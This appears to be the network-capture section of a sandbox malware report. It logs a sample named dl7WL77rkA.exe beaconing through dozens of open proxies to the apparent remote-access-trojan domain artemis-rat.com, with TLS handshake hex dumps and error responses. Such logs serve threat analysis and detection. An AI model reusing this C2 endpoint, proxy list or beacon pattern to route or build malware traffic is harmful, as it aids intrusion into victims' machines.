                                                                                                                                                                                                                                                            807192.168.2.549971158.51.210.7577773876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.709460974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            808192.168.2.55168351.222.241.157517183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.709461927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.904815912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.905422926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.999305010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            809192.168.2.552172138.36.150.2610803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.709570885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            810192.168.2.55223495.140.124.16110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.709671021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            811192.168.2.552280107.180.88.173445683876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.711736917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            812192.168.2.551589163.172.147.89163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.711738110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.904849052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.905471087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.999325037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            813192.168.2.552158171.103.58.12280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.711910963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.129942894 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            814192.168.2.552382137.184.142.374433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.713485956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            815192.168.2.552286146.19.106.217123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.713773966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            816192.168.2.551610161.156.199.78803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.720222950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.751326084 CET75INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache/2.4.6 (CentOS)
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.790312052 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ee 6c d3 b7 0a 76 65 c0 91 73 c7 60 b3 23 6e a9 3c 7a 03 16 df 8b eb 24 ad 9e ff cd af 38 7f 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: lhelves`#n<z$8*,+0/$#('=<5/artemis-rat.com#7Y%>$qFBvmFmn7;O#^; qPHyWi(IR
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.095158100 CET536INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ee 6c d4 53 d5 bc fd 33 6e d0 bd 0d 38 4f 81 12 53 11 d8 9d 7e 77 44 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                                                                                                                                                                                            Data Ascii: C?elS3n8OS~wDDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.095246077 CET536INData Raw: c6 05 92 78 e0 4f 78 0a d2 60 c4 1d 4d 2f 50 10 83 ed 02 03 01 00 01 a3 82 02 75 30 82 02 71 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 05 a0 30 13 06 03 55 1d 25 04 0c 30 0a 06 08 2b 06 01 05 05 07 03 01 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00
                                                                                                                                                                                                                                                            Data Ascii: xOx`M/Pu0q0U0U%0+0U00U<IXM%A'CF20U#0n+_+0x+l0j05+0)http://ocsp.pki.goog/s/gts1p5/4mHaPTRzkCs01+0%http://pki.g
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.095257998 CET536INData Raw: 00 76 00 da b6 bf 6b 3f b5 b6 22 9f 9b c2 bb 5c 6b e8 70 91 71 6c bb 51 84 85 34 bd a4 3d 30 48 d7 fb ab 00 00 01 8d aa 09 6c 5a 00 00 04 03 00 47 30 45 02 20 14 4e 3d 50 55 e8 cc 24 1d 57 8b ac c0 53 a0 61 43 18 61 8b d3 67 2d ed cd aa b3 4e 5c
                                                                                                                                                                                                                                                            Data Ascii: vk?"\kpqlQ4=0HlZG0E N=PU$WSaCag-N\:b!ixanr9,1rtlY0*HR5zo_$F|QNc4+G@]LiY%}+]24'-6TsnqM}oVM)k+T/
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.095341921 CET536INData Raw: 30 39 33 30 30 30 30 30 34 32 5a 30 46 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 13 30 11 06 03 55 04 03 13 0a 47 54 53 20 43 41 20 31 50
                                                                                                                                                                                                                                                            Data Ascii: 0930000042Z0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50"0*H0$-D[>eO-XZ(juORUJ[H6%#_`e\:\m}0N<etxs1to
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.095437050 CET536INData Raw: 2b 06 01 05 05 07 30 01 86 1a 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 70 6b 69 2e 67 6f 6f 67 2f 67 74 73 72 31 30 30 06 08 2b 06 01 05 05 07 30 02 86 24 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 72 65 70 6f 2f 63 65 72 74 73 2f 67 74 73 72 31
                                                                                                                                                                                                                                                            Data Ascii: +0http://ocsp.pki.goog/gtsr100+0$http://pki.goog/repo/certs/gtsr1.der04U-0+0)'%#http://crl.pki.goog/gtsr1/gtsr1.crl0MU F0D08+y0*0(+https://pki.goog/repository/0g0*Hlc'
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.095449924 CET536INData Raw: 08 0f 09 3e 23 5a c7 e3 42 2d 7a 36 e4 3d 98 96 60 39 98 ea d1 db 63 2a eb 78 09 b1 4e 21 b3 8e b7 ce 3e 92 f1 95 5c a4 39 d0 c0 2b c8 53 15 f5 d2 2f 82 cd 06 74 67 99 90 77 37 0a 97 2d c5 1c 1e f4 d0 5b e9 15 e3 ea 02 09 c8 13 d7 13 70 65 bf fb
                                                                                                                                                                                                                                                            Data Ascii: >#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*j%[ @4 awHI)adcGF9sO+Xe Uon=zcmf0b0Jwl6!
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.095556974 CET536INData Raw: f6 b1 f9 ce 84 1d b1 f9 c5 97 de ef b9 f2 a3 e9 bc 12 89 5e a7 aa 52 ab f8 23 27 cb a4 b1 9c 63 db d7 99 7e f0 0a 5e eb 68 a6 f4 c6 5a 47 0d 4d 10 33 e3 4e b1 13 a3 c8 18 6c 4b ec fc 09 90 df 9d 64 29 25 23 07 a1 b4 d2 3d 2e 60 e0 cf d2 09 87 bb
                                                                                                                                                                                                                                                            Data Ascii: ^R#'c~^hZGM3NlKd)%#=.`HMzY1.ml~&E=y(&<hS:+z.uVdOh=@\5lPL 3R2)%*Hrd8fcx{\wv
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.095568895 CET536INData Raw: 66 2c ef f0 89 13 71 3e 30 1f 06 03 55 1d 23 04 18 30 16 80 14 60 7b 66 1a 45 0d 97 ca 89 50 2f 7d 04 cd 34 a8 ff fc fd 4b 30 60 06 08 2b 06 01 05 05 07 01 01 04 54 30 52 30 25 06 08 2b 06 01 05 05 07 30 01 86 19 68 74 74 70 3a 2f 2f 6f 63 73 70
                                                                                                                                                                                                                                                            Data Ascii: f,q>0U#0`{fEP/}4K0`+T0R0%+0http://ocsp.pki.goog/gsr10)+0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.095706940 CET306INData Raw: 28 03 00 1d 20 8b 8b 3e 9d 35 4c 33 71 ec 22 a0 23 80 55 51 14 51 b1 ad f9 24 86 d8 2f 5d 0a 1a 92 57 c1 1c 32 08 04 01 00 09 3b 59 74 cc c3 da dc 96 95 97 ff 52 fe 0e d6 cb de 6c 00 85 3e 5a 3a 24 b2 8d f4 b1 04 7c 84 74 c1 07 9a ac 8a 3b 60 85
                                                                                                                                                                                                                                                            Data Ascii: ( >5L3q"#UQQ$/]W2;YtRl>Z:$|t;`6-^AJ$dWg&dastRI[hnTr-w+&I*+<WAXKl"_/DsU<z@@%.r.l+&U>TM


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            817192.168.2.55178172.167.222.113125813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.725864887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.811336040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.811523914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.905200005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            818192.168.2.552341104.20.24.214803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.753374100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.907713890 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            819192.168.2.552350203.30.190.172803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.758878946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.913419962 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            820192.168.2.550203103.76.12.5831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.768424988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.141925097 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            821192.168.2.552265188.166.17.1888813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.768624067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.067239046 CET310INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 150
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            822192.168.2.552357104.16.106.65803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.768748045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.923418999 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            823192.168.2.552212103.231.45.14510803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.770332098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            824192.168.2.552363104.23.125.117803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.770795107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
